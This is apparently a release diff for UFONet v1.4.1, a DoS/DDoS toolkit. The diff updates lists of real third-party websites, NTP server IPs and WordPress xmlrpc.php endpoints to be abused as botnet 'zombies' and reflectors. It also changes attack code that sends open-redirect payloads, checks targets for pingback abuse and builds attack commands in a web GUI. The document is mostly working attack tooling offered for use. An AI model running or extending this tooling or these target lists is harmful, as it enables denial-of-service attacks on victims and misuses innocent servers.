UFONet v1.4.1 released...

README.md

@@ -2,15 +2,19 @@
 
 ----------
 
- + Web:  https://ufonet.03c8.net
+ + Web:   https://ufonet.03c8.net
+
+ + Video: https://ufonet.03c8.net/ufonet/ufonet-timewars.ogv
 
 ----------
 
- + FAQ:  https://ufonet.03c8.net/FAQ.html
+ + FAQ:   https://ufonet.03c8.net/FAQ.html
 
 ----------
 
-  UFONet - is a toolkit designed to launch DDoS and DoS attacks.
+  UFONet - is a free software, P2P and cryptographic -disruptive toolkit- that allows to perform DoS and DDoS attacks; 
+on the Layer 7 (APP/HTTP) through the exploitation of Open Redirect vectors on third-party websites to act as a botnet 
+and on the Layer3 (Network) abusing the protocol.
 
   See these links for more info:
 

botnet/aliens.txt

@@ -1 +1,7 @@
-https://gtmetrix.com/analyze.html;$POST;url
+https://isitdown.co.uk/check/;$POST;domainname
+https://www.site24x7.com/check-website-availability.html;$POST;url
+https://nibbler.silktide.com/en_US/report/submit;$POST;url
+https://checkwebsiteonline.com/domain;$POST;url
+https://websitechecker.online/test_url;$POST;url
+https://isitdown.co.uk/check/;$POST;domainname
+https://wheresitup.com/demo/results;$POST;url

botnet/droids.txt

@@ -1 +1,11 @@
-https://jigsaw.w3.org/css-validator/validator?uri=$TARGET&profile=css3&usermedium=all&vextwarning=true
+https://www.openadmintools.com/en/$TARGET
+http://www.statscrop.com/www/$TARGET
+https://www.whatsmydns.net/#A/$TARGET
+http://sitecheck.sucuri.net/results/$TARGET
+https://www.sslshopper.com/ssl-checker.html#hostname=$TARGET
+http://developers.google.com/speed/pagespeed/insights/?url=$TARGET
+https://gsnedders.html5.org/outliner/process.py?url=$TARGET
+http://www.siteworthtraffic.com/report/$TARGET
+http://www.textise.net/showText.aspx?strURL=$TARGET
+http://www.htmlhelp.com/cgi-bin/validate.cgi?url=$TARGET&warnings=yes&spider=yes
+https://mxtoolbox.com/SuperTool.aspx?action=$TARGET

botnet/ntp.txt

@@ -1,4 +1,110 @@
-185.144.161.170
 91.121.7.182
 81.16.47.5
 194.112.182.172
+129.6.15.29
+129.6.15.30
+129.6.15.27
+129.6.15.26
+132.163.97.1
+132.163.97.2
+132.163.97.3
+132.163.97.4
+132.163.97.6
+132.163.96.1
+132.163.96.2
+132.163.96.3
+132.163.96.4
+132.163.96.6
+132.163.97.7
+128.138.140.44
+128.138.141.172
+128.138.140.50
+194.35.252.7 	
+81.168.77.149
+194.164.127.6
+130.88.203.12
+130.88.200.4
+194.207.34.9
+193.201.200.83
+194.164.127.5
+194.164.127.4
+216.239.35.8
+139.78.97.128 
+137.92.140.80
+128.250.36.2
+138.194.21.154
+130.155.98.1
+130.95.156.206
+104.31.87.35
+103.126.53.123
+129.250.35.251
+146.164.48.5
+142.3.100.2
+52.34.132.170
+146.83.8.202
+200.54.149.24
+195.113.144.201
+131.188.3.220
+131.188.3.221
+131.188.3.222
+131.188.3.223
+130.149.17.21
+130.149.17.8
+192.53.103.108
+192.53.103.104
+129.69.1.153
+138.96.64.10
+145.238.203.14
+138.96.64.10
+140.203.204.77
+193.204.114.232
+193.204.114.233
+200.23.51.102
+193.67.79.202
+193.79.237.14
+129.242.4.241
+129.6.15.28
+150.254.190.51
+193.2.4.2
+118.189.138.5
+194.58.203.20
+194.58.203.148
+194.58.204.20
+194.58.204.148
+128.9.176.30
+208.91.196.74
+193.11.166.8
+193.11.166.20
+194.58.202.20
+194.58.202.148
+192.36.143.150
+192.36.143.151
+162.23.41.10
+195.186.1.100
+104.31.86.35
+193.62.22.98
+199.165.76.11
+204.123.2.5
+164.67.62.194
+149.20.64.28
+209.81.9.7
+192.12.19.20
+204.232.226.192
+208.91.196.74
+132.163.96.1
+132.163.96.2
+132.163.96.3
+132.163.96.4
+128.138.140.44
+192.5.41.209
+192.5.41.40
+128.4.1.1
+128.4.1.2
+128.175.60.175
+128.227.205.3
+130.207.244.240
+140.31.199.22
+96.126.107.76
+173.162.192.156
+192.101.21.1
+146.186.222.14

botnet/rpcs.txt

@@ -1 +1,55 @@
-https://heightsmedia.com/xmlrpc.php
+http://www.ch-orthez.fr/xmlrpc.php
+http://178.62.42.31/xmlrpc.php
+http://131.220.122.225/xmlrpc.php
+http://192.81.222.191/xmlrpc.php
+http://104.236.21.36/xmlrpc.php
+http://128.199.97.120/xmlrpc.php
+http://122.117.66.52/xmlrpc.php
+http://apollomedia.de/xmlrpc.php
+http://www.lifequest-services.com/xmlrpc.php
+http://broketobooked.com/xmlrpc.php
+http://blog.libinpan.com/xmlrpc.php
+http://extensor.no/xmlrpc.php
+http://gotchacovered.bm/xmlrpc.php
+http://missionglobal.com/xmlrpc.php
+http://kompetensnavet.org/xmlrpc.php
+http://195.189.95.152/xmlrpc.php
+http://vatsim-scandinavia.org/xmlrpc.php
+http://www.skidmoreandhall.com/xmlrpc.php
+http://sgcl.ssu.ac.kr/xmlrpc.php
+http://stikespantirapih.ac.id/xmlrpc.php
+https://sifat.org/xmlrpc.php
+http://www.bankingonmainstreet.com/xmlrpc.php
+http://de.alanyatours.net/xmlrpc.php
+http://www.acupeace.com/xmlrpc.php
+http://www.aandd-ps.com/xmlrpc.php
+http://www.egpos.org/xmlrpc.php
+http://www.drivingsales.tv/xmlrpc.php
+http://www.idealvpn.com/xmlrpc.php
+http://www.meteo-agriculture.eu/xmlrpc.php
+http://www.formpac.com/xmlrpc.php
+http://www.mirchimusicawards.com/xmlrpc.php
+http://www.markgoessens.nl/xmlrpc.php
+http://www.openschooldns.com/xmlrpc.php
+http://www.theshawcentre.org.uk/xmlrpc.php
+http://www.fadhilza.com/xmlrpc.php
+http://www.tman.ca/hanas/xmlrpc.php
+http://www.supersupport.com/xmlrpc.php
+http://www.wheresmalta.com/xmlrpc.php
+http://www.unabashedresearch.com/xmlrpc.php
+http://blog.speedbit.com/xmlrpc.php
+http://clothingasconversation.com/xmlrpc.php
+http://preprod.chu-amiens.fr/xmlrpc.php
+http://wp.omni-tech.net/xmlrpc.php
+http://www.bedfactorycontracts.co.uk/xmlrpc.php
+http://www.zs18.wroc.pl/xmlrpc.php
+http://eldermet.ucc.ie/xmlrpc.php
+http://www.litteratureaudio.com/wordpress/xmlrpc.php
+http://digitalequality.net/xmlrpc.php
+http://www.niitsuhome.com/wp/xmlrpc.php
+http://www.fmfracing.com/wordpress/xmlrpc.php
+http://mpillumination.com/xmlrpc.php
+https://www.e-publicrealestate.gr/xmlrpc.php
+http://www.sbc4d.com/xmlrpc.php
+http://www.emotion.lu/xmlrpc.php
+https://mylivegym.gr/xmlrpc.php

botnet/ucavs.txt

@@ -1 +1,7 @@
-https://website-down.com/
+https://isitup.org/
+https://www.downforeveryoneorjustme.com/
+https://www.isitdownrightnow.com/
+https://check-host.net/ip-info?host=
+https://www.isthissitedown.org/site/
+https://downdetector.com/search/?q=
+https://updowntoday.com/en/sites/

botnet/zombies.txt

@@ -1 +1,3 @@
-https://validator.w3.org/check?uri=
+http://www.babalweb.net/ar/open.php?url=
+http://translate.google.com/translate?u=
+http://check-host.net/check-http?host=

core/herd.py

@@ -86,7 +86,7 @@ class Herd(object):
         if options.verbose == True:
             if ac>self.living:
                 if ac-self.living not in self.ufonet.ac_control:
-                    print("[Info] [AI] [Control] Active [ARMY] returning from the combat front: "+ str(ac-self.living))
+                    print("[Info] [AI] [Control] Number of Active [ARMY] returning from battle front: "+ str(ac-self.living))
                     self.ufonet.ac_control.append(ac-self.living)
         with self.lock:
             return ac==self.living

core/main.py

@@ -2174,6 +2174,9 @@ class UFONet(object):
             if abductions_reply == "" and troops_reply == "" and robots_reply == "" and drones_reply == "" and reflectors_reply == "" and crystals_reply == "" and warps_reply == "":
                 print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX FAILED!]")
                 print('-'*12 + '\n')
+                print("[Info] [AI] You can try to download [Zombies] from a different [Blackhole] [Server] (provided by someone!) with:\n\n ex: ufonet --down-from '<IP>'")
+                print("\nOr/And from a [Blackhole] [GitHub] with:\n\n ex: ufonet --download-github")
+                print('-'*12 + '\n')
                 print("[Error] [AI] Unable to download list of [Zombies] from this [Blackhole] [Server] -> [Exiting!]\n")
                 return
             f = open('botnet/abductions.txt.gz', 'wb')
@@ -2201,6 +2204,9 @@ class UFONet(object):
         except:
             print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX FAILED!]")
             print('-'*12 + '\n')
+            print("[Info] [AI] You can try to download [Zombies] from a different [Blackhole] [Server] (provided by someone!) with:\n\n ex: ufonet --down-from '<IP>'")
+            print("\nOr/And from a [Blackhole] [GitHub] with:\n\n ex: ufonet --download-github")
+            print('-'*12 + '\n')
             print("[Error] [AI] Unable to download list of [Zombies] from this [Blackhole] [Server] -> [Exiting!]\n")
             return
         print('-'*12 + '\n')
@@ -3079,7 +3085,7 @@ class UFONet(object):
             if target_reply == "": # check for target's status resolved by [UCAVs]
                 pass
             else:
-                if not "is down" or not "looks down" in target_reply: # parse external service for reply
+                if not "is down" or not "looks down" or not "No info found for host" in target_reply: # parse external service for reply
                     print("[Info] [UCAVs] " + name_ucav + " -> Target is ONLINE! -> [Keep shooting!]")
                     self.num_is_up = self.num_is_up + 1 
                 else:
@@ -3893,7 +3899,7 @@ class UFONet(object):
 
     def testing_offline(self):
         # check for zombies offline
-        print ("\n[Info] [AI] Checking for [Zombies] offline!\n")
+        print ("\n[Info] [AI] Checking (sending HTTP HEAD requests) for [Zombies] offline...\n")
         print('='*35)
         zombies_online = 0
         zombies_offline = 0
@@ -3929,9 +3935,15 @@ class UFONet(object):
             if zombie_type == 'Alien': # [Aliens] are made with keyword ;$POST;
                 sep = ';$POST;'
                 zombie = zombie.split(sep, 1)[0]
-            reply = str(self.connect_zombie(zombie))
+            try:
+                reply = str(self.connect_zombie(zombie))
+            except:
+                reply = None
             if reply:
-                status = "ONLINE!"
+                if reply == "200" or reply == "301" or reply == "302":
+                    status = "ONLINE! -> [OK!]"
+                else:
+                    status = "ONLINE! -> [BUT replying an INVALID HTTP CODE]"
                 zombies_online = zombies_online + 1
             else:
                 status = "NOT Working!"
@@ -3939,7 +3951,7 @@ class UFONet(object):
             print("\nName:", name_zombie)
             print("Type: [", zombie_type, "]")
             print("Vector:", zombie)
-            print("HTTP Code:", reply)
+            print("HTTP Code: [", reply, "]")
             print("STATUS:", status)
             print('-'*21)
             if status == "NOT Working!": # add to discarded zombies
@@ -4104,7 +4116,7 @@ class UFONet(object):
         options = self.options
         if self.options.testall: #testing_all
             print('='*51)
-        print ("Are 'plasma' reflectors ready? :-) (XML-RPC Check):")
+        print ("Are 'plasma' reflectors ready? :-) (XML-RPC 'Pingback' Vulnerability Check):")
         print('='*51)
         num_active_rpcs = 0
         num_failed_rpcs = 0
@@ -4115,7 +4127,7 @@ class UFONet(object):
             self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
             headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
             if rpc.startswith("http://") or rpc.startswith("https://"):
-                print("[Info] [X-RPCs] Searching 'Pingback' on:", rpc)
+                print("[Info] [X-RPCs] Exploiting 'X-Pingback' at:", rpc)
                 rpc_host = rpc.replace("/xmlrpc.php", "")
                 rpc_vulnerable, rpc_pingback_url = self.search_rpc(rpc_host)
                 if rpc_vulnerable == True: # discover XML-RPC system.listMethods allowed
@@ -4123,23 +4135,28 @@ class UFONet(object):
                     try:
                         if options.proxy: # set proxy
                             self.proxy_transport(options.proxy)
-                        req = urllib.request.Request(rpc_pingback_url, rpc_methods.encode('utf-8'), headers)
-                        target_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
+                        try:
+                            req = urllib.request.Request(rpc_pingback_url, rpc_methods.encode('utf-8'), headers)
+                            target_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
+                        except:
+                            if self.options.verbose:
+                                traceback.print_exc()
                         if self.options.verbose:
                             print("[Info] [X-RPCs] Reply:", target_reply)
                         if "pingback.ping" in target_reply: # XML-RPC pingback.ping method is allowed!
-                            print("[Info] [AI] [ "+rpc+" ] ->  [VULNERABLE!]")
+                            print("[Info] [AI] -> [VULNERABLE!]")
                             rpcs_ready.append(rpc_pingback_url) # save XML-RPC path as RPC zombie
                             num_active_rpcs = num_active_rpcs + 1 # add fail to rpcs stats
                         else:
-                            print("[Info] [AI] [ "+rpc+" ] ->  [NOT vulnerable...]")
+                            print("[Info] [AI] -> [NOT vulnerable...]")
                             num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats
                     except:
-                        print("[Info] [AI] It is NOT vulnerable...")
+                        print("[Info] [AI] -> [NOT vulnerable...]")
                         num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats
                 else:
-                    print("[Info] [AI] It is NOT vulnerable...")
+                    print("[Info] [AI] -> [NOT vulnerable...]")
                     num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats
+            print('-'*21)
         print('='*18)
         print("OK:", num_active_rpcs, "Fail:", num_failed_rpcs)
         print('='*18)
@@ -4148,7 +4165,7 @@ class UFONet(object):
         else:
             # update 'rpcs' list
             if num_active_rpcs == 0:
-                print("\n[Info] [X-RPCs] Not any vulnerable 'rpc' active!\n")
+                print("\n[Info] [X-RPCs] Not any vulnerable 'XML-RPC' active!\n")
                 return
             else:
                 if not self.options.forceyes:
@@ -4165,7 +4182,7 @@ class UFONet(object):
                         print("\n[Info] [AI] Botnet updated! -> ;-)\n")
 
     def testing(self, zombies):
-        # test Open Redirect vulnerabilities on webapps and show statistics
+        # test Open Redirect exploiting and show statistics
         # HTTP HEAD check
         army = 0
         print ("Are 'they' alive? :-) (HEAD Check):")
@@ -4180,7 +4197,10 @@ class UFONet(object):
             if zombie.startswith("http://") or zombie.startswith("https://"):
                 # send HEAD connection
                 self.head = True
-                self.connect_zombies(zombie)
+                try:
+                    self.connect_zombies(zombie)
+                except:
+                    pass
         while self.herd.no_more_zombies() == False:
             time.sleep(1)
         for zombie in self.herd.done:
@@ -4189,7 +4209,7 @@ class UFONet(object):
             if self.herd.get_result(zombie):
                 code_reply = self.herd.get_result(zombie)
                 self.head = False
-                if code_reply == "200" or code_reply == "302" or code_reply == "301" or code_reply == "401" or code_reply == "403" or code_reply == "405":
+                if code_reply == "200" or code_reply == "302" or code_reply == "301": # HEAD check pass!
                     name_zombie = t.netloc
                     if name_zombie == "":
                         name_zombie = zombie
@@ -4197,10 +4217,22 @@ class UFONet(object):
                     print("Status: OK ["+ code_reply + "]")
                     num_active_zombies = num_active_zombies + 1
                     active_zombies.append(zombie)
+                elif code_reply == "401":
+                    print("Zombie:", t.netloc)
+                    print("Status: Unauthorized ["+ code_reply + "]")
+                    num_failed_zombies = num_failed_zombies + 1
+                elif code_reply == "403":
+                    print("Zombie:", t.netloc)
+                    print("Status: Error Forbidden ["+ code_reply + "]")
+                    num_failed_zombies = num_failed_zombies + 1
                 elif code_reply == "404":
                     print("Zombie:", t.netloc)
                     print("Status: Not Found ["+ code_reply + "]")
                     num_failed_zombies = num_failed_zombies + 1
+                elif code_reply == "500":
+                    print("Zombie:", t.netloc)
+                    print("Status: Internal Server Error ["+ code_reply + "]")
+                    num_failed_zombies = num_failed_zombies + 1
                 else:
                     print("Zombie:", t.netloc, "\nVector:", zombie)
                     print("Status: Not Allowed ["+ code_reply + "]")
@@ -4236,7 +4268,10 @@ class UFONet(object):
                 if name_zombie == "":
                     name_zombie = zombie
                 self.payload = True
-                self.connect_zombies(zombie)
+                try:
+                    self.connect_zombies(zombie)
+                except:
+                    pass
                 self.payload = False
             while self.herd.no_more_zombies() == False:
                 time.sleep(1)
@@ -4301,7 +4336,7 @@ class UFONet(object):
             print('='*24)
             print("Working [Zombies]:", num_active_zombies)
             print('='*24)
-            print("\n[Info] [AI] [Zombies] aren't replying to your HEAD check! -> [Exiting!]\n")
+            print("\n[Info] [AI] [Zombies] aren't replying to your HTTP HEAD requests! -> [Exiting!]\n")
 
     def testing_all(self):
         # test whole botnet

core/options.py

@@ -43,7 +43,7 @@ class UFONetOptions(optparse.OptionParser):
         optparse.OptionParser.__init__(self, 
         description='\n{(D)enial(OF)Fensive(S)ervice[ToolKit]}-{by_(io=psy+/03c8.net)}',
         prog='./ufonet',
-        version='\nCode: v1.4 [APT] T!M3-WaRS\n')
+        version='\nCode: v1.4.1 [APT] T!M3-WaRS\n')
         self.add_option("-v", "--verbose", action="store_true", dest="verbose", help="active verbose on requests")
         self.add_option("--examples", action="store_true", dest="examples", help="print some examples")
         self.add_option("--timeline", action="store_true", dest="timeline", help="show program's code timeline")

core/webgui.py

@@ -9,6 +9,11 @@ You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
+#######WORKAROUND PYTHON(3) VERSIONS####################
+import platform                                       
+python_version = "python"+platform.python_version_tuple()[0]+"."+platform.python_version_tuple()[1] 
+#######################################################
+
 import socket, threading, re, os, time, random, base64
 import webbrowser, subprocess, json, sys
 import urllib.request, urllib.error, urllib.parse
@@ -27,6 +32,7 @@ from core.tools.abductor import Abductor
 default_blackhole = '176.28.23.46' # default blackhole            #
 crypto_key = "U-NATi0n!" # default enc/dec (+moderator board) key #
 ###################################################################
+
 blackhole_sep = "|" # blackhole stream separator
 board_msg_sep = "#!#" # board stream separator
 grid_msg_sep = "#?#" # grid stream seperator
@@ -1462,8 +1468,8 @@ Last update: <font color='"""+ self.blackholes_status_color + """'>"""+ self.bla
                     job_estimated_dec = strftime("%d-%m-%Y %H:%M:%S", job_estimated_dec)
                     print("[Info] [Wargames] Time is over: [" + str(job_estimated_dec) + "] -> Engaging target: " + str(job_target_dec))
                     cmd = ""
-                    nonroot_cmd = "python -i ufonet -a "+str(job_target_dec)+" -r "+str(self.supply_botnet)+" "
-                    root_cmd = "sudo python -i ufonet -a "+str(job_target_dec)+" -r "+str(self.supply_botnet)+" "
+                    nonroot_cmd = python_version + " -i ufonet -a "+str(job_target_dec)+" -r "+str(self.supply_botnet)+" "
+                    root_cmd = "sudo "+ python_version+" -i ufonet -a "+str(job_target_dec)+" -r "+str(self.supply_botnet)+" "
                     if int(self.supply_monlist) > 0: 
                         cmd += "--monlist " +str(self.supply_monlist)+ " "
                         flag_monlist = True
@@ -2814,7 +2820,7 @@ function runCommandX(cmd,params) {
                 self.pages[page] = AjaxMap().ajax(pGet)
         if page == "/cmd_check_tool":
             self.pages["/cmd_check_tool"] = "<pre>Waiting for updates results...</pre>"
-            runcmd = "(python -i ufonet --update |tee /tmp/out) &"
+            runcmd = "("+python_version+" -i ufonet --update |tee /tmp/out) &"
         if page == "/cmd_check_tool_update":
             if not os.path.exists('/tmp/out'):
                 open('/tmp/out', 'w').close()
@@ -2840,16 +2846,16 @@ function runCommandX(cmd,params) {
                 self.pages["/cmd_view_attack"] = self.html_army_map(pGet['target'])
         if page == "/cmd_test_army":
             self.pages["/cmd_test_army"] = "<pre>Waiting for testing results...</pre>"
-            runcmd = "(python -i ufonet -t " + self.zombies_file + " " + cmd_options + "|tee /tmp/out) &"
+            runcmd = "("+python_version+" -i ufonet -t " + self.zombies_file + " " + cmd_options + "|tee /tmp/out) &"
         if page == "/cmd_test_all":
             self.pages["/cmd_test_all"] = "<pre>Waiting for testing results...</pre>"
-            runcmd = "(python -i ufonet --test-all " + cmd_options + "|tee /tmp/out) &"
+            runcmd = "("+python_version+" -i ufonet --test-all " + cmd_options + "|tee /tmp/out) &"
         if page == "/cmd_test_offline":
             self.pages["/cmd_test_offline"] = "<pre>Waiting for testing results...</pre>"
-            runcmd = "(python -i ufonet --test-offline " + cmd_options + "|tee /tmp/out) &"
+            runcmd = "("+python_version+" -i ufonet --test-offline " + cmd_options + "|tee /tmp/out) &"
         if page == "/cmd_attack_me":
             self.pages["/cmd_attack_me"] = "<pre>Waiting for 'attack-me' results...</pre>"
-            runcmd = "(python -i ufonet --attack-me " + cmd_options + "|tee /tmp/out) &"
+            runcmd = "("+python_version+" -i ufonet --attack-me " + cmd_options + "|tee /tmp/out) &"
         if page == "/cmd_attack_me_update":
             if not os.path.exists('/tmp/out'):
                 open('/tmp/out', 'w').close()
@@ -2857,7 +2863,7 @@ function runCommandX(cmd,params) {
                 self.pages["/cmd_attack_me_update"] = "<pre>"+f.read()+"<pre>"
         if page == "/cmd_download_community":
             self.pages["/cmd_download_community"] = "<pre>Waiting for downloading results...</pre>"
-            runcmd = "(python -i ufonet --download-zombies "+ cmd_options + "|tee /tmp/out) &"
+            runcmd = "("+python_version+" -i ufonet --download-zombies "+ cmd_options + "|tee /tmp/out) &"
         if page == "/cmd_download_community_update":
             if not os.path.exists('/tmp/out'):
                 open('/tmp/out', 'w').close()
@@ -2865,7 +2871,7 @@ function runCommandX(cmd,params) {
                 self.pages["/cmd_download_community_update"] = "<pre>"+f.read()+"<pre>"
         if page == "/cmd_upload_community":
             self.pages["/cmd_upload_community"] = "<pre>Waiting for uploading results...</pre>"
-            runcmd = "(python -i ufonet --upload-zombies "+ cmd_options + "|tee /tmp/out) &"
+            runcmd = "("+python_version+" -i ufonet --upload-zombies "+ cmd_options + "|tee /tmp/out) &"
         if page == "/cmd_upload_community_update":
             if not os.path.exists('/tmp/out'):
                 open('/tmp/out', 'w').close()
@@ -2888,7 +2894,7 @@ function runCommandX(cmd,params) {
                 self.pages["/cmd_test_offline_update"] = "<pre>"+f.read()+"<pre>"
         if page == "/cmd_test_rpcs":
             self.pages["/cmd_test_rpcs"] = "<pre>Waiting for XML-RPC testing results...</pre>"
-            runcmd = "(python -i ufonet --test-rpc " + cmd_options + "|tee /tmp/out) &"
+            runcmd = "("+python_version+" -i ufonet --test-rpc " + cmd_options + "|tee /tmp/out) &"
         if page == "/cmd_test_rpcs_update":
             if not os.path.exists('/tmp/out'):
                 open('/tmp/out', 'w').close()
@@ -2904,8 +2910,8 @@ function runCommandX(cmd,params) {
             flag_nuke = None
             flag_tachyon = None
             flag_monlist = None
-            nonroot_cmd = "(python -i ufonet -a '"+pGet["target"]+"' -b '"+pGet["path"]+"' -r '"+pGet["rounds"]+"' "
-            root_cmd = "(sudo python -i ufonet -a '"+pGet["target"]+"' -b '"+pGet["path"]+"' -r '"+pGet["rounds"]+"' "
+            nonroot_cmd = "("+python_version+" -i ufonet -a '"+pGet["target"]+"' -b '"+pGet["path"]+"' -r '"+pGet["rounds"]+"' "
+            root_cmd = "(sudo "+python_version+" -i ufonet -a '"+pGet["target"]+"' -b '"+pGet["path"]+"' -r '"+pGet["rounds"]+"' "
             end_cmd = ""+cmd_options + "|tee /tmp/out) &"
             if pGet["dbstress"]:
                 cmd += "--db '" +str(pGet["dbstress"])+ "' "
@@ -2948,7 +2954,7 @@ function runCommandX(cmd,params) {
             self.pages["/cmd_inspect"] = "<pre>Waiting for inspecting results...</pre>"
             target = pGet["target"]
             target=urllib.parse.unquote(target) 
-            runcmd = "(python -i ufonet -i '"+target+"' "+ cmd_options + "|tee /tmp/out) &"
+            runcmd = "("+python_version+" -i ufonet -i '"+target+"' "+ cmd_options + "|tee /tmp/out) &"
         if page == "/cmd_inspect_update":
             if not os.path.exists('/tmp/out'):
                 open('/tmp/out', 'w').close()
@@ -2958,7 +2964,7 @@ function runCommandX(cmd,params) {
             self.pages["/cmd_abduction"] = "<pre>Waiting for abduction results...</pre>"
             target = pGet["target"]
             target=urllib.parse.unquote(target)
-            runcmd = "(python -i ufonet -x '"+target+"' "+ cmd_options + "|tee /tmp/out) &"
+            runcmd = "("+python_version+" -i ufonet -x '"+target+"' "+ cmd_options + "|tee /tmp/out) &"
         if page == "/cmd_abduction_update":
             if not os.path.exists('/tmp/out'):
                 open('/tmp/out', 'w').close()
@@ -2969,25 +2975,25 @@ function runCommandX(cmd,params) {
             if pGet["dork_list"] == "on": # search using dork list (file: dorks.txt)
                 if pGet["all_engines"] == "on": # search using all search engines (and exclude those set by the user)
                     if pGet["exclude_engines"]:
-                        runcmd = "(python -i ufonet --sd 'botnet/dorks.txt' --sa '"+pGet["exclude_engines"]+"' " + cmd_options + "|tee /tmp/out) &"
+                        runcmd = "("+python_version+" -i ufonet --sd 'botnet/dorks.txt' --sa '"+pGet["exclude_engines"]+"' " + cmd_options + "|tee /tmp/out) &"
                     else:
-                        runcmd = "(python -i ufonet --sd 'botnet/dorks.txt' --sa " + cmd_options + "|tee /tmp/out) &"
+                        runcmd = "("+python_version+" -i ufonet --sd 'botnet/dorks.txt' --sa " + cmd_options + "|tee /tmp/out) &"
                 else: # search using a search engine
-                    runcmd = "(python -i ufonet --sd 'botnet/dorks.txt' --se '"+pGet["s_engine"]+"' " + cmd_options + "|tee /tmp/out) &"
+                    runcmd = "("+python_version+" -i ufonet --sd 'botnet/dorks.txt' --se '"+pGet["s_engine"]+"' " + cmd_options + "|tee /tmp/out) &"
             else: # search using a pattern
                 if pGet["autosearch"] == "on": # search using auto-search mod
                     if pGet["exclude_engines"]:
-                        runcmd = "(python -i ufonet --auto-search '"+pGet["exclude_engines"]+"' " + cmd_options + "|tee /tmp/out) &"
+                        runcmd = "("+python_version+" -i ufonet --auto-search '"+pGet["exclude_engines"]+"' " + cmd_options + "|tee /tmp/out) &"
                     else:
-                        runcmd = "(python -i ufonet --auto-search " + cmd_options + "|tee /tmp/out) &"
+                        runcmd = "("+python_version+" -i ufonet --auto-search " + cmd_options + "|tee /tmp/out) &"
                 else:
                     if pGet["all_engines"] == "on": # search using all search engines
                         if pGet["exclude_engines"]:
-                            runcmd = "(python -i ufonet -s '"+pGet["dork"]+"' --sa '"+pGet["exclude_engines"]+"' " + cmd_options + "|tee /tmp/out) &"
+                            runcmd = "("+python_version+" -i ufonet -s '"+pGet["dork"]+"' --sa '"+pGet["exclude_engines"]+"' " + cmd_options + "|tee /tmp/out) &"
                         else:
-                            runcmd = "(python -i ufonet -s '"+pGet["dork"]+"' --sa " + cmd_options + "|tee /tmp/out) &"
+                            runcmd = "("+python_version+" -i ufonet -s '"+pGet["dork"]+"' --sa " + cmd_options + "|tee /tmp/out) &"
                     else: # search using a search engine
-                        runcmd = "(python -i ufonet -s '"+pGet["dork"]+"' --se '"+pGet["s_engine"]+"' " + cmd_options + "|tee /tmp/out) &"
+                        runcmd = "("+python_version+" -i ufonet -s '"+pGet["dork"]+"' --se '"+pGet["s_engine"]+"' " + cmd_options + "|tee /tmp/out) &"
         if page == "/cmd_search_update":
             if not os.path.exists('/tmp/out'):
                 open('/tmp/out', 'w').close()

core/zombie.py

@@ -48,7 +48,7 @@ class Zombie: # class representing a zombie
             c.setopt(pycurl.URL, self.zombie) # set 'self.zombie' target
             c.setopt(pycurl.NOBODY, 1) # use HEAD
         if self.payload == True:
-            payload = self.zombie + "https://www.whitehouse.gov" #Open Redirect payload [requested by all UFONet motherships ;-)]
+            payload = self.zombie + "https://www.whitehouse.gov" # Open Redirect payload [requested by all UFONet motherships ;-)]
             c.setopt(pycurl.URL, payload) # set 'self.zombie' payload
             c.setopt(pycurl.NOBODY, 0) # use GET
         if self.ufo.external == True:
@@ -170,8 +170,17 @@ class Zombie: # class representing a zombie
                 except:
                     self.connection_failed = True
         if self.ufo.head == True: # HEAD reply
-            code_reply = c.getinfo(pycurl.HTTP_CODE)
-            reply = b.getvalue().decode('utf-8')
+            try:
+                reply = b.getvalue().decode('utf-8')
+            except:
+                try:
+                    reply = b.getvalue()
+                except:
+                    reply = None
+            try:
+                code_reply = c.getinfo(pycurl.HTTP_CODE)
+            except:
+                code_reply = 0
             if reply:
                 if options.verbose:
                     print("[Info] [AI] HEAD Reply:")
@@ -181,30 +190,57 @@ class Zombie: # class representing a zombie
             else:
                 return code_reply
         if self.ufo.external == True: # External reply
-            external_reply = h.getvalue().decode('utf-8')
+            try:
+                external_reply = h.getvalue().decode('utf-8')
+            except:
+                try:
+                    external_reply = h.getvalue()
+                except:
+                    external_reply = None
             if external_reply:
                 if options.verbose:
                     print("[Info] [AI] EXTERNAL Reply:")
                     print("\n"+ external_reply)
             return external_reply
         if self.payload == True: # Payloads reply
-            payload_reply = h.getvalue().decode('utf-8')
+            try:
+                payload_reply = h.getvalue().decode('utf-8')
+            except:
+                try:
+                    payload_reply = h.getvalue()
+                except:
+                    payload_reply = None
             if payload_reply:
                 if options.verbose:
                     print("[Info] [AI] PAYLOAD Reply:")
                     print("\n"+ payload_reply)
             return payload_reply
         if self.attack_mode == True: # Attack mode reply
-            attack_reply = h.getvalue().decode('utf-8')
-            reply_code = c.getinfo(c.RESPONSE_CODE)
+            try:
+                attack_reply = h.getvalue().decode('utf-8')
+            except:
+                try:
+                    attack_reply = h.getvalue()
+                except:
+                    attack_reply = None
+            try:
+                reply_code = c.getinfo(c.RESPONSE_CODE)
+            except:
+                reply_code = 0
+            try:
+                reply_time = c.getinfo(c.TOTAL_TIME)
+            except:
+                reply_time = 0
+            try:
+                reply_size = len(attack_reply)
+            except:
+                reply_size = 0
             if options.verbose:
-                print("[Info] [AI] [Zombies] "+self.zombie+" -> REPLY (HTTP Code: "+ str(reply_code)+" | Time: "+str(c.getinfo(c.TOTAL_TIME))+" | Size: " + str(len(attack_reply))+")")
+                print("[Info] [AI] [Zombies] "+self.zombie+" -> REPLY (HTTP Code: "+ str(reply_code)+" | Time: "+str(reply_time)+" | Size: " + str(reply_size)+")")
                 time.sleep(5) # managing screen (multi-threading flow time compensation)
             if len(attack_reply) == 0:
                 print("[Info] [Zombies] " + self.zombie + " -> FAILED (cannot connect!)")
                 if not self.ufo.options.disablepurge: # when purge mode discard failed zombie
                     self.ufo.discardzombies.append(self.zombie)
                     self.ufo.num_discard_zombies = self.ufo.num_discard_zombies + 1
-            return [c.getinfo(c.RESPONSE_CODE), 
-                    c.getinfo(c.TOTAL_TIME), 
-                    len(attack_reply)]
+            return [reply_code, reply_time, reply_size]

docs/examples.txt

